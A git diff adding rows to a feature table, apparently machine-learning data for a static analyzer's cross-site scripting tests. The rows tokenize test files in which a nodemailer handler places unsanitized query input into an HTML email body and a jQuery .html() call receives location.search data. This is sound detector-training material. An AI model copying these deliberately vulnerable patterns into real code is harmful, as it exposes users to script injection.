autogenerated/Xss/DomBasedXss/nodemailer.js:10:9:10:15 | backend | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:9:10:15 | backend | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:9:10:15 | backend | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:9:10:15 | backend | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:9:10:28 | backend.getUserEmail | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:9:10:28 | backend.getUserEmail | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:9:10:28 | backend.getUserEmail | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:9:10:28 | backend.getUserEmail | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:9:10:28 | backend.getUserEmail | fileImports | ./backend express nodemailer | | autogenerated/Xss/DomBasedXss/nodemailer.js:10:9:10:48 | backend ... ceiver) | CalleeFlexibleAccessPath | transport.sendMail | | autogenerated/Xss/DomBasedXss/nodemailer.js:10:9:10:48 | backend ... ceiver) | InputAccessPathFromCallee | 0.to | | autogenerated/Xss/DomBasedXss/nodemailer.js:10:9:10:48 | backend ... ceiver) | InputArgumentIndex | 0 | @@ -14334,6 +104222,26 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/nodemailer.js:10:9:10:48 | backend ... ceiver) | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | | autogenerated/Xss/DomBasedXss/nodemailer.js:10:9:10:48 | backend ... ceiver) | enclosingFunctionName | app.post#functionalargument | | autogenerated/Xss/DomBasedXss/nodemailer.js:10:9:10:48 | backend ... ceiver) | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:9:10:48 | exceptional return of backend ... ceiver) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:9:10:48 | exceptional return of backend ... ceiver) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:9:10:48 | exceptional return of backend ... ceiver) | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:9:10:48 | exceptional return of backend ... ceiver) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:9:10:48 | exceptional return of backend ... ceiver) | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:17:10:28 | getUserEmail | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:17:10:28 | getUserEmail | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:17:10:28 | getUserEmail | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:17:10:28 | getUserEmail | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:17:10:28 | getUserEmail | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:30:10:32 | req | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:30:10:32 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:30:10:32 | req | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:30:10:32 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:30:10:32 | req | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:30:10:38 | req.query | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:30:10:38 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:30:10:38 | req.query | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:30:10:38 | req.query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:30:10:38 | req.query | fileImports | ./backend express nodemailer | | autogenerated/Xss/DomBasedXss/nodemailer.js:10:30:10:47 | req.query.receiver | CalleeFlexibleAccessPath | backend.getUserEmail | | autogenerated/Xss/DomBasedXss/nodemailer.js:10:30:10:47 | req.query.receiver | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/nodemailer.js:10:30:10:47 | req.query.receiver | calleeImports | ./backend | @@ -14343,6 +104251,31 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/nodemailer.js:10:30:10:47 | req.query.receiver | enclosingFunctionName | app.post#functionalargument | | autogenerated/Xss/DomBasedXss/nodemailer.js:10:30:10:47 | req.query.receiver | fileImports | ./backend express nodemailer | | autogenerated/Xss/DomBasedXss/nodemailer.js:10:30:10:47 | req.query.receiver | receiverName | backend | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:34:10:38 | query | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:34:10:38 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:34:10:38 | query | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:34:10:38 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:34:10:38 | query | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:40:10:47 | receiver | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:40:10:47 | receiver | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:40:10:47 | receiver | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:40:10:47 | receiver | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:40:10:47 | receiver | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:11:5:11:11 | subject | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:11:5:11:11 | subject | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/nodemailer.js:11:5:11:11 | subject | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:11:5:11:11 | subject | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:11:5:11:11 | subject | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:11:5:11:30 | subject ... essage' | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:11:5:11:30 | subject ... essage' | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:11:5:11:30 | subject ... essage' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:11:5:11:30 | subject ... essage' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:11:5:11:30 | subject ... essage' | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:11:5:11:30 | subject ... essage' | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:11:5:11:30 | subject ... essage' | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:11:5:11:30 | subject ... essage' | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:11:5:11:30 | subject ... essage' | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:11:5:11:30 | subject ... essage' | fileImports | ./backend express nodemailer | | autogenerated/Xss/DomBasedXss/nodemailer.js:11:14:11:30 | 'Private message' | CalleeFlexibleAccessPath | transport.sendMail | | autogenerated/Xss/DomBasedXss/nodemailer.js:11:14:11:30 | 'Private message' | InputAccessPathFromCallee | 0.subject | | autogenerated/Xss/DomBasedXss/nodemailer.js:11:14:11:30 | 'Private message' | InputArgumentIndex | 0 | @@ -14353,6 +104286,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/nodemailer.js:11:14:11:30 | 'Private message' | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | | autogenerated/Xss/DomBasedXss/nodemailer.js:11:14:11:30 | 'Private message' | enclosingFunctionName | app.post#functionalargument | | autogenerated/Xss/DomBasedXss/nodemailer.js:11:14:11:30 | 'Private message' | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:5:12:8 | text | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:5:12:8 | text | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:5:12:8 | text | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:5:12:8 | text | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:5:12:8 | text | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:5:12:69 | text: ` ... sage}.` | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:5:12:69 | text: ` ... sage}.` | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:5:12:69 | text: ` ... sage}.` | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:5:12:69 | text: ` ... sage}.` | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:5:12:69 | text: ` ... sage}.` | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:5:12:69 | text: ` ... sage}.` | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:5:12:69 | text: ` ... sage}.` | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:5:12:69 | text: ` ... sage}.` | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:5:12:69 | text: ` ... sage}.` | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:5:12:69 | text: ` ... sage}.` | fileImports | ./backend express nodemailer | | autogenerated/Xss/DomBasedXss/nodemailer.js:12:11:12:69 | `Hi, yo ... sage}.` | CalleeFlexibleAccessPath | transport.sendMail | | autogenerated/Xss/DomBasedXss/nodemailer.js:12:11:12:69 | `Hi, yo ... sage}.` | InputAccessPathFromCallee | 0.text | | autogenerated/Xss/DomBasedXss/nodemailer.js:12:11:12:69 | `Hi, yo ... sage}.` | InputArgumentIndex | 0 | @@ -14363,6 +104311,59 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/nodemailer.js:12:11:12:69 | `Hi, yo ... sage}.` | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | | autogenerated/Xss/DomBasedXss/nodemailer.js:12:11:12:69 | `Hi, yo ... sage}.` | enclosingFunctionName | app.post#functionalargument | | autogenerated/Xss/DomBasedXss/nodemailer.js:12:11:12:69 | `Hi, yo ... sage}.` | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:12:12:47 | Hi, you ... meone. | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:12:12:47 | Hi, you ... meone. | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:12:12:47 | Hi, you ... meone. | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:12:12:47 | Hi, you ... meone. | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:12:12:47 | Hi, you ... meone. | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:12:12:47 | Hi, you ... meone. | stringConcatenatedWith | -endpoint- req.query.message + '.' | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:50:12:52 | req | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:50:12:52 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:50:12:52 | req | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:50:12:52 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:50:12:52 | req | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:50:12:58 | req.query | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:50:12:58 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:50:12:58 | req.query | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:50:12:58 | req.query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:50:12:58 | req.query | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:50:12:66 | req.query.message | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:50:12:66 | req.query.message | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:50:12:66 | req.query.message | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:50:12:66 | req.query.message | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:50:12:66 | req.query.message | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:50:12:66 | req.query.message | stringConcatenatedWith | 'Hi, you got a message from someone. ' -endpoint- '.' | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:54:12:58 | query | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:54:12:58 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:54:12:58 | query | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:54:12:58 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:54:12:58 | query | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:60:12:66 | message | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:60:12:66 | message | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:60:12:66 | message | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:60:12:66 | message | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:60:12:66 | message | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:68:12:68 | . | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:68:12:68 | . | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:68:12:68 | . | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:68:12:68 | . | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:68:12:68 | . | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:12:68:12:68 | . | stringConcatenatedWith | 'Hi, you got a message from someone. ' + req.query.message -endpoint- | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:5:13:8 | html | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:5:13:8 | html | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:5:13:8 | html | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:5:13:8 | html | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:5:13:8 | html | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:5:13:69 | html: ` ... sage}.` | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:5:13:69 | html: ` ... sage}.` | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:5:13:69 | html: ` ... sage}.` | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:5:13:69 | html: ` ... sage}.` | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:5:13:69 | html: ` ... sage}.` | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:5:13:69 | html: ` ... sage}.` | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:5:13:69 | html: ` ... sage}.` | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:5:13:69 | html: ` ... sage}.` | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:5:13:69 | html: ` ... sage}.` | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:5:13:69 | html: ` ... sage}.` | fileImports | ./backend express nodemailer | | autogenerated/Xss/DomBasedXss/nodemailer.js:13:11:13:69 | `Hi, yo ... sage}.` | CalleeFlexibleAccessPath | transport.sendMail | | autogenerated/Xss/DomBasedXss/nodemailer.js:13:11:13:69 | `Hi, yo ... sage}.` | InputAccessPathFromCallee | 0.html | | autogenerated/Xss/DomBasedXss/nodemailer.js:13:11:13:69 | `Hi, yo ... sage}.` | InputArgumentIndex | 0 | @@ -14373,6 +104374,143 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/nodemailer.js:13:11:13:69 | `Hi, yo ... sage}.` | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | | autogenerated/Xss/DomBasedXss/nodemailer.js:13:11:13:69 | `Hi, yo ... sage}.` | enclosingFunctionName | app.post#functionalargument | | autogenerated/Xss/DomBasedXss/nodemailer.js:13:11:13:69 | `Hi, yo ... sage}.` | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:12:13:47 | Hi, you ... meone. | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:12:13:47 | Hi, you ... meone. | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:12:13:47 | Hi, you ... meone. | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:12:13:47 | Hi, you ... meone. | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:12:13:47 | Hi, you ... meone. | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:12:13:47 | Hi, you ... meone. | stringConcatenatedWith | -endpoint- req.query.message + '.' | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:50:13:52 | req | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:50:13:52 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:50:13:52 | req | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:50:13:52 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:50:13:52 | req | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:50:13:58 | req.query | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:50:13:58 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:50:13:58 | req.query | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:50:13:58 | req.query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:50:13:58 | req.query | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:50:13:66 | req.query.message | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:50:13:66 | req.query.message | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:50:13:66 | req.query.message | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:50:13:66 | req.query.message | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:50:13:66 | req.query.message | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:50:13:66 | req.query.message | stringConcatenatedWith | 'Hi, you got a message from someone. ' -endpoint- '.' | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:54:13:58 | query | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:54:13:58 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:54:13:58 | query | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:54:13:58 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:54:13:58 | query | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:60:13:66 | message | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:60:13:66 | message | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:60:13:66 | message | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:60:13:66 | message | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:60:13:66 | message | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:68:13:68 | . | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:68:13:68 | . | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:68:13:68 | . | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:68:13:68 | . | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:68:13:68 | . | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:13:68:13:68 | . | stringConcatenatedWith | 'Hi, you got a message from someone. ' + req.query.message -endpoint- | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:1:1:1:0 | this | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:1:1:1:0 | this | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:1:1:1:0 | this | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:1:1:1:0 | this | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:1:1:1:0 | this | fileImports | | +| 